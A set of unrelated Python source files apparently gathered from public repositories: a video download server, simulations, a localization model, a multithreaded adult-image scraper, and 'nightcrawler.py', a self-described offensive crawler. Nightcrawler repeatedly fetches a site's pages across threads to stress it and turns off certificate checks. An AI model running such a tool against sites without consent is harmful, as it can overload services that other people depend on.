while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
"self.object",
self.object_cls,
"generator never yielded object of type {}".format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed("Called `get_object` before `generate_setup_events`")
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
return six.ensure_str(subprocess.check_output(["git", "rev-parse", "--show-toplevel"]).strip())
def segfault():
"""Reliable cross-Python version segfault.
https://bugs.python.org/issue1215#msg143236
"""
import ctypes
ctypes.string_at(0)
def find_free_port():
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
@contextlib.contextmanager
def alter_sys_path(to_add, to_remove):
to_restore = [path for path in sys.path]
# remove paths
for path in to_remove:
if path in sys.path:
sys.path.remove(path)
# add paths
for path in to_add:
sys.path.insert(0, path)
try:
yield
finally:
sys.path = to_restore
@contextlib.contextmanager
def restore_sys_modules():
sys_modules = {k: v for k, v in sys.modules.items()}
try:
yield
finally:
to_delete = set(sys.modules) - set(sys_modules)
for key in to_delete:
del sys.modules[key]
def process_is_alive(pid):
if IS_WINDOWS:
import psutil # pylint: disable=import-error
return psutil.pid_exists(pid=pid)
else:
try:
subprocess.check_output(["ps", str(pid)])
except subprocess.CalledProcessError as exc:
assert exc.returncode == 1
return False
return True
def compose(*args):
"""
Compose python functions args such that compose(f, g)(x) is equivalent to f(g(x)).
"""
# reduce using functional composition over all the arguments, with the identity function as
# initializer
return functools.reduce(lambda f, g: lambda x: f(g(x)), args, lambda x: x)
|
serve.py | import socket
import re
import threading
from k_load.extractors import Bilibili
class DownloadSite:
'''
A website for downloading Bilibili videos.
'''
def _establish_socket(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,0)
self.sock.bind(('0.0.0.0', 80))
self.sock.listen(10)
self.client_pool = []
while True:
conn, addr = self.sock.accept()
thread = threading.Thread(target=Worker, args=(conn, ))
thread.setDaemon(True)
thread.start()
self.client_pool.append(thread)
def run(self):
'''
entry point
'''
self._establish_socket()
class Worker:
base_url = 'https://www.bilibili.com'
def __init__(self, conn):
self.conn = conn
self._process()
def _send_header(self, params):
head = 'HTTP/1.1 200 OK\r\n'
for p in params:
head += '%s: %s\r\n' % (p, str(params[p]))
head += '\r\n'
self.conn.send(head.encode())
def _process(self):
buffer = b''
while True:
pack = self.conn.recv(1024)
if pack is None or len(pack) < 1024:
buffer += pack
break
buffer += pack
req_header = buffer.decode()
re_url = self._parse_url(req_header)
if not re_url:
error_msg = 'params error'
res_header = self._send_header({'Content-Length': len(error_msg)})
self.conn.send(error_msg.encode())
else:
obj = self._get_k_load_res(re_url.group())
res_header = self._send_header({'Access-Control-Allow-Origin': '*',
'Content-Range': 'bytes',
'Content-Type': 'video/x-flv',
'Content-Length': obj.size,
'Content-Disposition': 'attachment; filename="%s.flv"' % obj.name})
self._send_file(obj)
self.conn.close()
def _parse_url(self, req_header):
try:
aid = req_header.split('\r\n')[0].split(' ')[1]
except:
return False
return re.match(r'\/video\/av\d+', aid)
def _get_k_load_res(self, url):
obj = Bilibili(**{'url': self.base_url+url})
obj.parse()
return obj
def _send_file(self, vid_obj):
pack_size = 2**18
while True:
buffer = vid_obj.resource_res.read(pack_size)
if not buffer:
try:
self.conn.send(buffer)
except:
pass
break
try:
self.conn.send(buffer)
except:
pass
app = DownloadSite()
app.run()
|
nightcrawler.py | #!/usr/bin/env python
# Nightcrawler - a web site offensive crawler
# https://www.freecodecamp.org/news/how-to-build-a-url-crawler-to-map-a-website-using-python-6a287be1da11/
# https://github.com/ahadsheriff/map-website/blob/master/map_website.py
import warnings
import requests.exceptions
import requests
import argparse
import sys
import coloredlogs, logging
from threading import Thread
from logging.handlers import WatchedFileHandler
from atpbar import atpbar
from collections import deque
from bs4 import BeautifulSoup
from urllib.parse import urlsplit
from urllib.parse import urlparse
__version__="0.1"
FORMATTER = logging.Formatter("%(asctime)s - [%(threadName)s] — %(name)s — %(levelname)s — %(message)s")
LOG_FILE = "nightcrawler.log"
def get_console_handler():
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(FORMATTER)
return console_handler
def get_file_handler():
file_handler = WatchedFileHandler(LOG_FILE)
file_handler.setFormatter(FORMATTER)
return file_handler
def get_logger(logger_name):
logger = logging.getLogger(logger_name)
logger.setLevel(logging.DEBUG) # better to have too much log than not enough
logger.addHandler(get_console_handler())
logger.addHandler(get_file_handler())
# with this pattern, it's rarely necessary to propagate the error up to parent
logger.propagate = False
return logger
def crawler(url: str, ofile: str, count:int, form_pollution:bool, ignore_cert:bool, name:str) -> int:
'''
Crawl and pollute website
Args:
url (str): this is the starting point for the crawler.
ofile (str): this is the optional report filename. If nil, only standard output will be used.
count (int): each discovered url will be fetched 'count' times. This can be useful if we want to stress the endpoint. Default set to 1.
form_pollution (bool): if set to True, the crawler will try to submit FORMs with bogus data. Default set to False.
ignore_cert (bool): if set to True, the crawler won't check the SSL certificate. Default set to True
Returns:
crawler: the number of discovered URLs
'''
try:
new_urls = deque([url])
processed_urls = set()
local_urls = set()
foreign_urls = set()
broken_urls = set()
s = requests.Session()
s.verify=False
while len(new_urls):
url = new_urls.popleft()
processed_urls.add(url)
my_logger.info("Processing %s" % url)
# for x in range(0, count):
for x in atpbar(range(0, count), name=name):
my_logger.debug(".")
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
response = s.get(url)
except(requests.exceptions.MissingSchema, requests.exceptions.ConnectionError, requests.exceptions.InvalidURL, requests.exceptions.InvalidSchema) as e:
broken_urls.add(url)
my_logger.warning(url+" added to broken url")
my_logger.warning(str(e))
continue
parts = urlsplit(url)
base = "{0.netloc}".format(parts)
strip_base = base.replace("www.", "")
base_url = "{0.scheme}://{0.netloc}".format(parts)
path = url[:url.rfind('/')+1] if '/' in parts.path else url
soup = BeautifulSoup(response.text, "lxml")
for link in soup.find_all('a'): # extract link url from the anchor
anchor = link.attrs["href"] if "href" in link.attrs else ''
if anchor.startswith('//'):
local_link = "{0.scheme}:".format(parts) + anchor
local_urls.add(local_link)
elif anchor.startswith('/'):
local_link = base_url + anchor
local_urls.add(local_link)
elif strip_base in anchor:
local_urls.add(anchor)
elif not anchor.startswith('http'):
local_link = path + anchor
local_urls.add(local_link)
else:
foreign_urls.add(anchor)
for i in local_urls:
if not i in new_urls and not i in processed_urls:
new_urls.append(i)
except KeyboardInterrupt:
sys.exit()
return len(local_urls)
def main(argv):
'''
This is THE main
Args:
argv(Array): the command line
Returns:
main(int): returns 0 if everything worked as expected or -1 in case of errors
'''
text="A python program that crawls a website and tries to stress it, polluting forms with bogus data"
parser = argparse.ArgumentParser(prog='nightcrawler', description=text, usage='%(prog)s [options]', epilog="Please make sure you're allowed to crawler and stress target website.")
parser.add_argument('--url', '-u', required=True, help='the url you want to start to crawl from')
parser.add_argument('--count', '-c', type=int, default=1, help='the number of times the crawler will get every url')
parser.add_argument('--threads', '-t', type=int, default=1, help='the number of concurrents thread. Useful to stress test the website')
parser.add_argument('--form-pollution', dest='pollution', action='store_true', help="pollute forms with bogus data")
parser.add_argument('--no-form-pollution', dest='pollution', action='store_false', help="be fair with forms and not submit any data")
parser.add_argument('--verbose', '-V', dest='verbose', action='store_true', help="be verbose")
parser.set_defaults(pollution=False)
parser.set_defaults(verbose=False)
parser.add_argument('--version', action='version', version='%(prog)s {version}'.format(version=__version__))
args = parser.parse_args()
url = args.url
count = args.count
pollution = args.pollution
t = args.threads
if args.verbose:
my_logger.setLevel(logging.DEBUG)
my_logger.debug(count)
threads = []
for ii in range(0, t):
name='thread {}'.format(ii)
process=Thread(target=crawler, args=[url, None, count, pollution, True, name])
process.daemon = True
process.start()
threads.append(process)
for process in threads:
process.join()
#crawler(url, None, count, pollution, True)
if __name__ == "__main__":
my_logger=get_logger("nigthcrawler")
my_logger.setLevel(logging.INFO)
coloredlogs.install()
main(sys.argv[1:])
|
asymmetric.py | #!/usr/bin/python3
#
# run iperf to measure the effective throughput between two nodes when
# n nodes are connected to a virtual wlan; run test for testsec
# and repeat for minnodes <= n <= maxnodes with a step size of
# nodestep
import threading, sys, time, random, os, traceback, playsound,json
import rest, socket
import parser
import logging
from builtins import range
from core import load_logging_config
from core.emulator.coreemu import CoreEmu
from core.emulator.emudata import IpPrefixes, NodeOptions
from core.emulator.enumerations import NodeTypes, EventTypes
from core.location.mobility import BasicRangeModel
from core import constants
load_logging_config()
nodes_to_send = []
class Auxiliar:
def __init__(self, path, motes):
self.motes = motes
self.path = path
self.nodesfinished = 0
def random_walk(self,motes):
for mote in motes:
pos = mote.getposition()
#print(motes[0].getposition())
mote.setposition(pos[0]+random.randint(-6,6),pos[1]+random.randint(-6,6))
def check_finished(self):
files = []
for (dirpath, dirnames, filenames) in os.walk(self.path):
files.extend(filenames)
break
if len(files) >= len(self.motes):
print('should be finished')
return False
if len(files) > self.nodesfinished:
self.nodesfinished = len(files)
logging.info(str(self.nodesfinished) + " nodes finished")
return True
def topology(tmax=10,protocol='eagp',time_mul=0.1,simul_max=20000):
global nodes_to_send
radius = 120
topofile = (os.path.basename(__file__)).split('.')[0]
motes = []
battery = [
'99', '89', '87', '95', '99',
'78', '87', '94', '96', '78',
'86', '94', '93', '96', '94',
'88', '84', '99', '79', '82',
'99', '69', '89', '96', '92',
'95', '92', '91', '96', '87'
]
# ip generator for example
prefixes = IpPrefixes("10.0.0.0/24")
# create emulator instance for creating sessions and utility methods
coreemu = CoreEmu()
session = coreemu.create_session()
# must be in configuration state for nodes to start, when using "node_add" below
session.set_state(EventTypes.CONFIGURATION_STATE)
# create wlan network node
wlan = session.add_node(_type=NodeTypes.WIRELESS_LAN)
session.mobility.set_model(wlan, BasicRangeModel,config={'range':radius, 'bandwidth': 54000000, 'jitter':0, 'delay': 5000, 'error': 0})
session.mobility.get_models(wlan)
# create nodes, must set a position for wlan basic range model
node_options=[]
for i in range(0,19):
node_options.append(NodeOptions(name='mote'+str(i)))
node_options[0].set_position( 75 ,127)
node_options[1].set_position( 175,124)
node_options[2].set_position( 72 ,224)
node_options[3].set_position( 177,224)
node_options[4].set_position( 127,37 )
node_options[5].set_position( 125,322)
node_options[6].set_position( 191,387)
node_options[7].set_position( 273,316)
node_options[8].set_position( 340,396)
node_options[9].set_position( 393,311)
node_options[10].set_position(452,397)
node_options[11].set_position(501,352)
node_options[12].set_position(551,301)
node_options[13].set_position(502,252)
node_options[14].set_position(603,251)
node_options[15].set_position(602,352)
node_options[16].set_position(327,222)
node_options[17].set_position(551,199)
node_options[18].set_position(551,400)
#adding the nodes
for node_opt in node_options:
motes.append(session.add_node(node_options=node_opt))
#configuring links
for mote in motes:
interface = prefixes.create_interface(mote)
session.add_link(mote.id, wlan.id, interface_one=interface)
# instantiate session
#session.save_xml('teste.xml')
session.instantiate()
#get simdir
simdir = str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min)
#create sink
sink=session.get_node(2)
motes[0].client.term_cmd("bash","/opt/eagp_sim/run.sh",[str(sink.name) + ' sink ' + str(time_mul) + ' esp8266 ' + str(tmax) + ' ' + topofile + ' ' + str(node_options[0].x) + ' ' + str(node_options[0].y) + ' ' + protocol + ' adhoc '+ battery[0] + ' ' + str(simul_max)])
#create motes
for i in range(1,len(motes)):
mote=session.get_node(i+2)
motes[i].client.term_cmd("bash","/opt/eagp_sim/run.sh",[str(mote.name) + ' mote ' + str(time_mul) + ' esp8266 ' + str(tmax) + ' ' + topofile + ' ' + str(node_options[i].x) + ' ' + str(node_options[i].y) + ' ' + protocol + ' adhoc '+ battery[i] + ' ' + str(simul_max)])
time.sleep(5) #wait for nodes to start and create socket
time_to_start = time.time()+2
#firing up the motes
for i in range(0,len(motes)):
mote=session.get_node(i+2)
try:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect("/tmp/ouroboros.sock."+str(mote.name))
s.send(str(time_to_start).encode())
s.close()
except:
#pass
traceback.print_exc()
time.sleep(1)
t1 = threading.Thread(target=send_nodes)
t1.start() #starts socket
#Rest = rest.Api(motes)
path ="./reports/" + simdir + "/finished"
logging.info("Checking for nodes finished in: " + path)
Aux = Auxiliar(path, motes)
lock=True
counter = 0
while lock==True:
lock = Aux.check_finished()
#if counter > 40: Aux.random_walk(motes)
nodes_to_send = []
for mote in motes:
data = mote.data('node')
nodes_to_send.append(data)
nodes_to_send.append(radius)
counter += 1
time.sleep(1)
# shutdown session
#Rest.shutdown()
stop_thread()
t1.join(timeout=1)
#playsound.playsound('fim.mp3')
coreemu.shutdown()
def send_nodes():
global nodes_to_send
#this section is a synchronizer so that all nodes can start at the same time
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
os.remove("/tmp/ouroboros/nodes.sock")
os.mkdir("/tmp/ouroboros/")
except OSError:
#traceback.print_exc()
pass
s.bind("/tmp/ouroboros/nodes.sock")
s.listen(1)
while True:
conn, addr = s.accept()
data = conn.recv(64)
if data.decode()=='get':
conn.send(json.dumps(nodes_to_send).encode())
elif data.decode()=='quit':
break
conn.close()
#print(float(data))
#receives the global time when they should start. Same for all and in this simulation the clock is universal since all nodes run in the same computer
s.close()
return data
def stop_thread():
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect("/tmp/ouroboros/nodes.sock")
s.send('quit'.encode())
s.close()
if __name__ == "__main__":
try:
tmax = sys.argv[1]
protocol = sys.argv[2]
time_mul = float(sys.argv[3])
simul_max = int(sys.argv[4])
except:
tmax = 100
protocol = 'eagp'
time_mul = 1
simul_max = 20000
topology(tmax,protocol,time_mul,simul_max)
|
sim-axelrod-parallel.py | #!/usr/bin/env python
# Copyright (c) 2013. Mark E. Madsen <mark@madsenlab.org>
#
# This work is licensed under the terms of the Apache Software License, Version 2.0. See the file LICENSE for details.
"""
Description here
"""
import logging as log
import ming
import argparse
import time
import itertools
import copy
import os
import uuid
import pprint as pp
import multiprocessing as mp
import madsenlab.axelrod.utils as utils
import madsenlab.axelrod.data as data
import madsenlab.axelrod.rules as rules
def setup():
global args, simconfig
parser = argparse.ArgumentParser()
parser.add_argument("--experiment", help="provide name for experiment", required=True)
parser.add_argument("--debug", help="turn on debugging output")
parser.add_argument("--dbhost", help="database hostname, defaults to localhost", default="localhost")
parser.add_argument("--dbport", help="database port, defaults to 27017", default="27017")
parser.add_argument("--configuration", help="Configuration file for experiment", required=True)
parser.add_argument("--parallelism", help="Number of concurrent processes to run", default="4")
parser.add_argument("--diagram", help="Draw a diagram when complete", default=False)
args = parser.parse_args()
simconfig = utils.AxelrodConfiguration(args.configuration)
if args.debug == '1':
log.basicConfig(level=log.DEBUG, format='%(asctime)s %(levelname)s: %(message)s')
else:
log.basicConfig(level=log.INFO, format='%(asctime)s %(levelname)s: %(message)s')
log.debug("experiment name: %s", args.experiment)
data.set_experiment_name(args.experiment)
data.set_database_hostname(args.dbhost)
data.set_database_port(args.dbport)
config = data.getMingConfiguration(data.modules)
ming.configure(**config)
def main():
global work_queue, process_list
process_list = []
work_queue = mp.JoinableQueue()
structure_class_name = simconfig.POPULATION_STRUCTURE_CLASS
log.info("Configuring Axelrod model with structure class: %s", structure_class_name)
create_queueing_process(work_queue, queue_simulations)
time.sleep(1)
create_processes(work_queue, run_simulation_worker)
try:
work_queue.join()
except KeyboardInterrupt:
log.info("simulations interrupted by ctrl-c")
for proc in process_list:
proc.terminate()
exit(1)
# End of main
def create_queueing_process(queue, worker):
process = mp.Process(target=worker, args=(queue, args))
process.daemon = True
process_list.append(process)
process.start()
def create_processes(queue, worker):
for i in range(0, int(args.parallelism)):
process = mp.Process(target=worker, args=(queue, args))
process.daemon = True
process_list.append(process)
process.start()
def queue_simulations(queue, args):
basic_config = utils.AxelrodConfiguration(args.configuration)
if basic_config.INTERACTION_RULE_CLASS == 'madsenlab.axelrod.rules.AxelrodDriftRule':
state_space = [
basic_config.POPULATION_SIZES_STUDIED,
basic_config.NUMBER_OF_DIMENSIONS_OR_FEATURES,
basic_config.NUMBER_OF_TRAITS_PER_DIMENSION,
basic_config.DRIFT_RATES
]
elif basic_config.INTERACTION_RULE_CLASS == 'madsenlab.axelrod.rules.AxelrodRule':
state_space = [
basic_config.POPULATION_SIZES_STUDIED,
basic_config.NUMBER_OF_DIMENSIONS_OR_FEATURES,
basic_config.NUMBER_OF_TRAITS_PER_DIMENSION,
]
else:
log.error("Unknown interaction rule class: %s", basic_config.INTERACTION_RULE_CLASS)
exit(1)
for param_combination in itertools.product(*state_space):
# for each parameter combination, make a copy of the base configuration
# set the specific param combo values, and queue the object
for repl in range(0, basic_config.REPLICATIONS_PER_PARAM_SET):
#log.debug("param combination: %s", param_combination)
sc = copy.deepcopy(basic_config)
sc.popsize = int(param_combination[0])
sc.num_features = int(param_combination[1])
sc.num_traits = int(param_combination[2])
if len(param_combination) == 4:
sc.drift_rate = float(param_combination[3])
sc.sim_id = uuid.uuid4().urn
sc.script = __file__
sc.periodic = 0
queue.put(sc)
log.info("All simulation configurations queued")
def run_simulation_worker(queue, args):
# pull a simconfig object off the queue
completed_count = 0
while True:
try:
simconfig = queue.get()
log.info("worker %s: starting run for popsize: %s numfeatures: %s numtraits: %s drift: %s",
os.getpid(), simconfig.popsize, simconfig.num_features, simconfig.num_traits,
simconfig.drift_rate)
gf_constructor = utils.load_class(simconfig.NETWORK_FACTORY_CLASS)
model_constructor = utils.load_class(simconfig.POPULATION_STRUCTURE_CLASS)
rule_constructor = utils.load_class(simconfig.INTERACTION_RULE_CLASS)
trait_factory_constructor = utils.load_class(simconfig.TRAIT_FACTORY_CLASS)
trait_factory = trait_factory_constructor(simconfig)
graph_factory = gf_constructor(simconfig)
model = model_constructor(simconfig, graph_factory, trait_factory)
model.initialize_population()
ax = rule_constructor(model)
timestep = 0
last_interaction = 0
while(1):
timestep += 1
if timestep % 10 == 0:
log.debug("time: %s active links: %s", timestep, ax.get_fraction_links_active())
ax.step(timestep)
if model.get_time_last_interaction() != timestep:
live = utils.check_liveness(ax, model, args, simconfig, timestep)
if live == False:
utils.sample_axelrod_model(model, args, simconfig)
break
# clean up before moving to next queue item
simconfig = None
model = None
completed_count += 1
if(completed_count % 100 == 0):
log.info("trait worker %s: completed %s samples", os.getpid(), completed_count )
finally:
queue.task_done()
if __name__ == "__main__":
setup()
main()
|
porn.py | import threading
import requests
from queue import Queue
from threading import Thread,Lock
import re
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'
}
lock = Lock()
def get_pic(in_q):
while in_q.empty() is not True:
try:
url = in_q.get()
ress = requests.get(url,headers = headers)
while url[-3:] != 'jpg':
url = re.findall("(.*)\?\d+",url)[0]
name = url[-21:]
lock.acquire()
fp = open(f"porn/{name.replace('/','_')}","wb")
fp.write(ress.content)
print("OK---------------------------------")
fp.close()
lock.release()
except (OSError,IndexError):
pass
in_q.task_done()
print("开始--------")
ur = "https://raw.githubusercontent.com/vllbc/nsfw_data_scraper/master/raw_data/porn/urls_porn.txt"
res = requests.get(ur)
uu = res.text.strip().split("\n")[20:-18]
queues = Queue()
for url in uu:
queues.put(url)
for _ in range(100):
thread = Thread(target=get_pic,args=(queues,))
thread.daemon = True
thread.start()
queues.join()
|
learn.py | #!/usr/bin/python3
import io
import csv
import json
import warnings
import pickle
import operator
import time
import logging
import math
import functools
import numpy
from sklearn.preprocessing import MinMaxScaler
from threading import Thread
from random import shuffle
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn import cluster, mixture
from sklearn.neighbors import kneighbors_graph
from s3_helper import put_file, get_file
#Librerias locindoor
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from tensorflow.keras.models import load_model
from core.data_processor import DataLoader
from core.model import Model
from core.trajectories import Trajectories
from core.aps import Aps
# create logger with 'spam_application'
logger = logging.getLogger('learn')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('learn.log')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - [%(name)s/%(funcName)s] - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
def timeout(timeout):
def deco(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
res = [Exception('function [%s] timeout [%s seconds] exceeded!' % (
func.__name__, timeout))]
def newFunc():
try:
res[0] = func(*args, **kwargs)
except Exception as e:
res[0] = e
t = Thread(target=newFunc)
t.daemon = True
try:
t.start()
t.join(timeout)
except Exception as je:
raise je
ret = res[0]
if isinstance(ret, BaseException):
raise ret
return ret
return wrapper
return deco
class AI(object):
def __init__(self, family=None):
self.logger = logging.getLogger('learn.AI')
self.naming = {'from': {}, 'to': {}}
self.family = 'posifi'
#self.ai = AI()
#self.ai.learn("TrainM11.csv")
def classify(self, sensor_data):
#self.logger.debug(sensor_data)
#header = self.header[1:]
datos = pd.read_csv('TrainM11.csv')
header = list(datos.columns[0:67])
#self.logger.debug(header)
is_unknown = True
lista_Ap = pd.read_csv("Listado_Aps12000.csv")
step = len(sensor_data)
#self.logger.debug(step)
#Filra los Ap detectados que no están en los Aps de entrenamiento
csv_data = numpy.zeros((step,len(header)))
for huella in range(len(sensor_data)):
for sensorType in sensor_data[huella]["s"]:
for sensor in (sensor_data[huella]["s"][sensorType]):
sensorName = 'Ap300'
for j in range (len(lista_Ap)):
if (lista_Ap['MAC'][j] == sensor):
sensorName = lista_Ap['nºAp'][j]
if sensorName in header:
is_unknown = False
csv_data[huella][header.index(sensorName)] = sensor_data[huella]["s"][sensorType][sensor]
#self.logger.debug("filtro")
#self.logger.debug(csv_data)
self.headerClassify = header
#self.logger.debug("tamaño")
#self.logger.debug(csv_data.shape)
#self.csv_dataClassify = csv_data.reshape(1, -1)
csv_dataClassify = csv_data
payload = {'location_names': self.naming['to'], 'predictions': []}
threads = [None]*len(self.algorithms)
self.results = [None]*len(self.algorithms)
#self.logger.debug(self.algorithms.keys())
#for i, alg in enumerate(self.algorithms.keys()):
threads[0] = Thread(target=self.do_classification, args=(0, "LSTM",step,csv_dataClassify,header))
threads[0].start()
#for i, _ in enumerate(self.algorithms.keys()):
threads[0].join()
for result in self.results:
if result != None:
payload['predictions'].append(result)
payload['is_unknown'] = is_unknown
#self.logger.debug("ultimo")
#self.logger.debug(self.algorithms.keys())
#self.logger.debug("fin clasiffy")
return payload
def minmax_norm(self, df, maximo, minimo):
df_minmax_norm = (df - minimo) / (maximo - minimo)
return df_minmax_norm
def normaliza (self, step, Train, datos, header):
df = pd.DataFrame(datos)
pasos_norm = numpy.zeros((step,67))
for j in range(len(header)):
if header[j] in Train.columns:
maximo = max(Train[header[j]])
minimo = min(Train[header[j]])
pasos_norm[:,step-j] = self.minmax_norm(df[j], maximo, minimo)
return pasos_norm
def coord_zona(self, coord):
if (coord[1] < 2):
col = self.coordX(coord[0])
zona = col
if (coord[1] >= 2) and (coord[1] < 4):
col = self.coordX(coord[0])
zona = col +18
if (coord[1] >= 4) and (coord[1] < 6):
col = self.coordX(coord[0])
zona = col +36
if (coord[1] >= 6) and (coord[1] < 8):
col = self.coordX(coord[0])
zona = col +54
if (coord[1] >= 8) and (coord[1] < 10):
col = self.coordX(coord[0])
zona = col + 72
return zona
def coordX(self, X):
aux = 0
if X < 0:
col1 = 0
for i in range(18):
if (X >= aux) and (X < aux+2):
col1 = i
aux= aux +2
if X > 36:
col1 = 17
return col1
def do_classification(self, index, name,step,csv_dataClassify,header):
t = time.time()
pasos = np.empty([step,csv_dataClassify.shape[1]])
#self.logger.debug("dentro de do")
#self.logger.debug(pasos.shape)
try:
if name == "LSTM":
self.logger.debug("LSTM")
# for h in range(step):
# csv_dataClassify[h][csv_dataClassify[h] == 0] = -100
# huella = csv_dataClassify[h]
# huella = huella.reshape(67,1)
# min_max_scaler = MinMaxScaler()
# x_scaled = min_max_scaler.fit_transform(huella)
# huella = x_scaled.reshape(1,67)
# pasos[step-1-h] = huella
Huellas_Train = pd.read_csv('data/Huellas_sNorm.csv')
csv_dataClassify[csv_dataClassify == 0] = -100
pasos = self.normaliza(step,Huellas_Train,csv_dataClassify,header)
# self.logger.debug(pasos)
if (step == 15):
pasos = pasos.reshape(1,step,67)
model_new = load_model('DLRNN_M11.h5', compile = False)
pred1 = model_new.predict(pasos)
prediccion = pred1[1]
# self.logger.debug(prediccion)
# self.logger.debug(prediccion.shape)
# self.logger.debug(type(prediccion))
else:
#self.logger.debug("en el else")
pasos2 = np.empty([15,67])
for i in range(15):
pasos2[i] = pasos[0]
pasos2 = pasos2.reshape(1,15,67)
model_new= load_model.predict('DLRNN_M11.h5', compile = False)
pred1 = model_new(pasos2)
prediccion = pred1[1]
self.logger.debug("Prediciión en coordenadas")
self.logger.debug(prediccion)
pred_zona=np.zeros([prediccion.shape[0],prediccion.shape[1]])
for i in range(prediccion.shape[0]):
for j in range(prediccion.shape[1]):
zona = self.coord_zona(prediccion[i,j,:])
pred_zona[i,j] = zona
#self.logger.debug(type(pred1))
#self.logger.debug(type(prediccion))
#self.logger.debug(type(pred_zona))
prediction =pred_zona.tolist()
#self.logger.debug(type(prediction))
#self.logger.debug(prediction)
#self.logger.debug("predicciones en zona")
else:
prediction = self.algorithms[name].predict_proba(csv_dataClassify)
except Exception as e:
self.logger.debug("Entro a Except")
logger.error(csv_dataClassify)
logger.error(str(e))
return
predict = {}
if name == "LSTM":
#a = np.int(str(prediction[0][14]))
a = np.int(prediction[0][14]+1)
self.logger.debug("Predicción en Zona")
self.logger.debug(prediction[0][14]+1)
prediction = np.zeros([1,90])
for i in range(90):
if (a == i):
prediction[0,i] = 100
for i, pred in enumerate(prediction[0]):
predict[i] = pred
predict_payload = {'name': name,'locations': [], 'probabilities': []}
badValue = False
for tup in sorted(predict.items(), key=operator.itemgetter(1), reverse=True):
predict_payload['locations'].append(str(tup[0]))
predict_payload['probabilities'].append(round(float(tup[1]), 2))
if math.isnan(tup[1]):
badValue = True
break
if badValue:
return
self.results[index] = predict_payload
@timeout(10)
def train(self, clf, x, y):
return clf.fit(x, y)
def trayecto(self, fname): #Generar los trayectos
configs = json.load(open('config.json', 'r'))
#Clase Ap - lee el archivo de MAC de los Aps y se genera un listado
Ap = Aps(os.path.join('data', configs['Aps']['listaAps']))
lista_Aps = Ap.listadoF2(configs)
#Litar Aps de Antel
lista_antel = Ap.Aps_antel(lista_Aps,os.path.join('data',configs['Aps']['listaAntel']))
#Listar Aps de Fing
lista_Fing = Ap.Aps_fing(lista_Aps,os.path.join('data',configs['Aps']['listaFing']))
# Se cargan los datos y se procesan
data = DataLoader(fname)
# en datos se cargan la matriz de huellas recolectadas - según el tipo de matriz que queramos - se especifica en config
datos = data.huellas(configs, lista_antel, lista_Aps)
#Filtrado de columnas con poca información
datos = data.filtro_Ap(datos, configs['Aps']['descartamos'],-85)
# cargamos los datos con una huella aleatoria por zona
datos_una_huella = data.una_huella_zona(datos)
#Normalizamos los datos RSSI (Las zonas quedan con nùmero de zona)
huellas_norm_df = data.normaliza(datos_una_huella)
#datos.to_csv('datos.csv', index=False)
# Se genera Trayectorias_aleatorias que es un matriz que cada fila corresponde a una trayectoria de T pasos
# La cantidad de trayectorias que queremos generar y los pasos se pasan como parametro
trayectorias = Trajectories(configs)
mapa = trayectorias.crear_mapa(configs)
Trayectorias_aleatorias = trayectorias.generacion_trayectorias(configs['trajectory']['T'],configs['trajectory']['cantidad'],mapa)
#Se genera una matriz de 3D donde a cada paso de la trayectoria le corresponde una función de huellas
Matriz_Trayectorias_una_huella = trayectorias.trayectorias_con_una_huella(huellas_norm_df,Trayectorias_aleatorias)
data_train, data_test = trayectorias.train_and_test(Matriz_Trayectorias_una_huella,configs['data']['train_test_split'])
train3D_X, train3D_y = data_train[:,:,:-1], data_train[:,:, -1]
test3D_X, test3D_y = data_test[:,:,:-1], data_test[:,:, -1]
#trainY_coord3D = data.coordenadas(train3D_y)
#testY_coord3D = data.coordenadas(test3D_y)
return train3D_X, test3D_X, train3D_y, test3D_y
def learn(self, fname):
self.logger.debug("ESTOY EN LA FUNCION LEARN")
self.model = Model()
t = time.time()
configs = json.load(open('config.json', 'r'))
#Cargo el archivo que contiene las huellas para clasificar
fname = "datos_final.csv"
#genero las trayectoiras y lo separo en train y test
#train3D_X, test3D_X, train3D_y, test3Y_y = self.trayecto(fname)
self.header = []
rows = []
naming_num = 0
with open('TrainM11.csv', 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for i, row in enumerate(reader):
#self.logger.debug(row)
if i == 0:
self.header = row
else:
for j, val in enumerate(row):
if j == len(row)-1:
# this is a name of the location
if val not in self.naming['from']:
self.naming['from'][val] = naming_num
valor = str(int(float(val)))
#self.naming['to'][naming_num] = "location" + "_" + valor
